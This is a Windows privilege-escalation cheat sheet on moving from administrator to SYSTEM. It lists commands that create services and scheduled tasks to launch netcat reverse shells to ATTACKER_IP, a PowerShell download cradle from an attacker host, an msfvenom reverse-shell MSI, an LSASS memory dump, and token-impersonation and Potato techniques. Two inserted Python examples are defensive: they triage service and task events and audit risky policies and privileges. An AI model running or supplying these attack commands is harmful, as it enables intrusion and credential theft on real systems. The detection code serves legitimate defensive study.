
Overview

High integrity (local admin) is not SYSTEM. Some post-exploitation tasks require SYSTEM: dumping LSASS, accessing certain registry hives, or interacting with services. There are multiple paths to escalate; this page lists them.

Create New Service

sc create EvilService binpath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" start= auto
sc start EvilService
Or for a command:
sc create EvilService binpath= "cmd.exe /c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
sc start EvilService
Cleanup:
sc delete EvilService

PsExec

Sysinternals PsExec with the -s flag runs the given command as SYSTEM.
PsExec64.exe -accepteula -s -i cmd.exe
Interactive SYSTEM shell:
PsExec64.exe -accepteula -s -i powershell.exe
Remote SYSTEM:
PsExec64.exe -accepteula -s \\TARGET cmd.exe

Scheduled Task

schtasks /create /tn "EvilTask" /tr "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /sc once /st 00:00 /ru SYSTEM
schtasks /run /tn "EvilTask"
Cleanup:
schtasks /delete /tn "EvilTask" /f
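The three paths above (new service, PsExec, scheduled task) each leave a Windows event behind: a 7045 "A service was installed in the system" record in the System log for the service and for PsExec's PSEXESVC, and a 4698 "A scheduled task was created" record in the Security log. The following triage logic is an added example and is not code from the original page; it runs over constructed event records whose field names are modelled on the event XML (ServiceName, ImagePath, AccountName, TaskName, TaskContent), so map your collector's fields onto them.

```python
"""Triage service-install (7045) and task-create (4698) events for the
SYSTEM-escalation patterns above. Added example; records are constructed."""
import re

# Binaries that are shells or network utilities, not legitimate service hosts.
SHELL_OR_NET_TOOL = re.compile(
    r"(?i)\b(cmd|powershell|pwsh|nc|ncat|mshta|rundll32|regsvr32)\.exe\b")
# Directories a standard user can usually write to.
USER_WRITABLE_DIR = re.compile(
    r"(?i)\\(temp|tmp|programdata|users\\[^\\]+\\(appdata|downloads))\\")
SYSTEM_PRINCIPALS = {"LocalSystem", "NT AUTHORITY\\SYSTEM", "SYSTEM", "S-1-5-18"}


def _path_reasons(command_line):
    reasons = []
    if SHELL_OR_NET_TOOL.search(command_line):
        reasons.append("command is a shell or network utility")
    if USER_WRITABLE_DIR.search(command_line):
        reasons.append("binary lives in a user-writable directory")
    return reasons


def triage_service_install(event):
    """Event 7045: flag PsExec's service and odd binaries started as SYSTEM."""
    reasons = []
    if event.get("ServiceName", "").upper() == "PSEXESVC":
        reasons.append("PsExec service (PSEXESVC) installed")
    reasons += _path_reasons(event.get("ImagePath", ""))
    if reasons and event.get("AccountName") in SYSTEM_PRINCIPALS:
        reasons.append("service account is SYSTEM")
    return reasons


def triage_task_create(event):
    """Event 4698: the task definition XML is carried in the TaskContent field."""
    xml = event.get("TaskContent", "")
    parts = [m.group(1) for m in re.finditer(r"<(?:Command|Arguments)>([^<]*)<", xml)]
    reasons = _path_reasons(" ".join(parts))
    user = re.search(r"<UserId>([^<]+)</UserId>", xml)
    if reasons and user and user.group(1).strip() in SYSTEM_PRINCIPALS:
        reasons.append("task principal is SYSTEM")
    return reasons


def triage(events):
    """Return one finding per flagged event: (event id, object name, reasons)."""
    findings = []
    for ev in events:
        if ev["EventID"] == 7045:
            reasons, name = triage_service_install(ev), ev.get("ServiceName")
        elif ev["EventID"] == 4698:
            reasons, name = triage_task_create(ev), ev.get("TaskName")
        else:
            continue
        if reasons:
            findings.append((ev["EventID"], name, reasons))
    return findings


# Constructed sample events (not real telemetry); 10.0.0.5 is a placeholder address.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "EvilService", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\Temp\nc.exe -e cmd.exe 10.0.0.5 4444"},
    {"EventID": 7045, "ServiceName": "PSEXESVC", "AccountName": "LocalSystem",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 7045, "ServiceName": "Sense", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"'},
    {"EventID": 4698, "TaskName": r"\EvilTask",
     "TaskContent": (r"<Task><Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>"
                     r"<Actions><Exec><Command>C:\Windows\Temp\nc.exe</Command>"
                     r"<Arguments>-e cmd.exe 10.0.0.5 4444</Arguments></Exec></Actions></Task>")},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": (r"<Task><Principals><Principal><UserId>S-1-5-18</UserId></Principal></Principals>"
                     r"<Actions><Exec><Command>%windir%\system32\defrag.exe</Command>"
                     r"<Arguments>-c -h -k -g</Arguments></Exec></Actions></Task>")},
]

if __name__ == "__main__":
    for event_id, name, reasons in triage(SAMPLE_EVENTS):
        print(f"[{event_id}] {name}: {'; '.join(reasons)}")
```

The "runs as SYSTEM" reason is only appended when another indicator already fired, because almost every legitimate service and many built-in tasks run as SYSTEM; on its own it is noise, combined with a shell binary in a Temp directory it is the signature of the commands above.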

Named Pipes — Meterpreter getsystem

Meterpreter automates named pipe impersonation:
meterpreter > getsystem
Three techniques:
  1. Named pipe impersonation (default)
  2. Token duplication
  3. Named pipe impersonation (RPCSS variant)

Token Manipulation

Incognito (Meterpreter)

meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"

PowerShell — Invoke-TokenManipulation

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/Invoke-TokenManipulation.ps1')
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

DLL Hijacking on SYSTEM Service

If a SYSTEM service loads a DLL from a writable path:
  1. Find writable DLL path (see Service Exploits)
  2. Drop malicious DLL
  3. Restart service → executes as SYSTEM

AlwaysInstallElevated → SYSTEM

If the policy is enabled, MSI packages install as SYSTEM:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi
See Misconfigurations.

SeImpersonate → SYSTEM

If the high-integrity process holds SeImpersonatePrivilege:
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
See Potato Attacks.

SeDebug + SeImpersonate

With both privileges you can open SYSTEM processes directly (for example, dump LSASS) or migrate into one:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
Or via Meterpreter:
meterpreter > ps
meterpreter > migrate <SYSTEM_PID>
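For the AlwaysInstallElevated and SeImpersonate / SeDebug conditions above, here is a host-side audit that tells a defender whether a machine is exposed. It is an added example and not code from the original page. It assumes: the AlwaysInstallElevated value lives under `SOFTWARE\Policies\Microsoft\Windows\Installer` in both HKLM and HKCU and the policy is only effective when both are set to 1 (a single hive set is a frequent false positive); the privilege check parses the text `whoami /priv` prints, fed here from a constructed sample. The registry reader needs `winreg`, so it only runs on Windows; function names are the example's own.

```python
"""Audit AlwaysInstallElevated and the SeImpersonate / SeDebug privileges.
Added example; the whoami output below is constructed, not captured."""
import re
import subprocess

INSTALLER_POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege": "token impersonation (Potato-style escalation)",
    "SeDebugPrivilege": "open any process, including LSASS and SYSTEM processes",
}


def always_install_elevated(hklm_value, hkcu_value):
    """The policy only takes effect when BOTH hives set the value to 1.
    One hive alone (a common finding) is not exploitable."""
    return hklm_value == 1 and hkcu_value == 1


def read_install_elevated_policy():
    """Read both hives on Windows; returns (hklm, hkcu), None where unset."""
    import winreg  # Windows-only module; ImportError elsewhere
    values = []
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, INSTALLER_POLICY_KEY) as key:
                values.append(winreg.QueryValueEx(key, "AlwaysInstallElevated")[0])
        except OSError:
            values.append(None)
    return tuple(values)


def parse_whoami_priv(text):
    """Parse `whoami /priv` output into {privilege name: enabled?}.
    A privilege shown as Disabled still counts: its holder can enable it."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def risky_privileges(privs):
    """Subset of held privileges that open a SYSTEM escalation path."""
    return {name: RISKY_PRIVILEGES[name] for name in privs if name in RISKY_PRIVILEGES}


def current_whoami_priv():
    """Run the real command (Windows only) and return its output."""
    return subprocess.run(["whoami", "/priv"], capture_output=True,
                          text=True, check=True).stdout


# Constructed output shaped like `whoami /priv` in a high-integrity admin shell.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for name, why in risky_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)).items():
        print(f"{name}: {why}")
    try:
        hklm, hkcu = read_install_elevated_policy()
        print("AlwaysInstallElevated effective:", always_install_elevated(hklm, hkcu))
    except ImportError:
        print("winreg unavailable (not Windows); registry check skipped")
```

On a Windows host, replace SAMPLE_WHOAMI_PRIV with current_whoami_priv() to audit the live token. Note that SeDebugPrivilege is normally present but disabled for administrators; the audit reports it anyway, since the section above only requires that the token holds it.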

Parent PID Spoofing

Create a process with a SYSTEM process as its parent:
$parent = Get-Process -Name "winlogon" | Select -First 1
# Use NtCreateProcess or CreateProcess with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
Tools:
https://github.com/decoder-it/psgetsystem
Import-Module .\psgetsys.ps1
[MyProcess]::CreateProcessFromParent((Get-Process winlogon).Id, "cmd.exe")

Quick Reference

| Method | Requires | Complexity |
| --- | --- | --- |
| PsExec -s | Admin + PsExec on disk | Low |
| New service | Admin | Low |
| Scheduled task | Admin | Low |
| Meterpreter getsystem | Meterpreter session | Low |
| Token manipulation | Admin + tool | Medium |
| Parent PID spoofing | Admin + SeDebug | Medium |
| Potato attacks | SeImpersonate | Medium |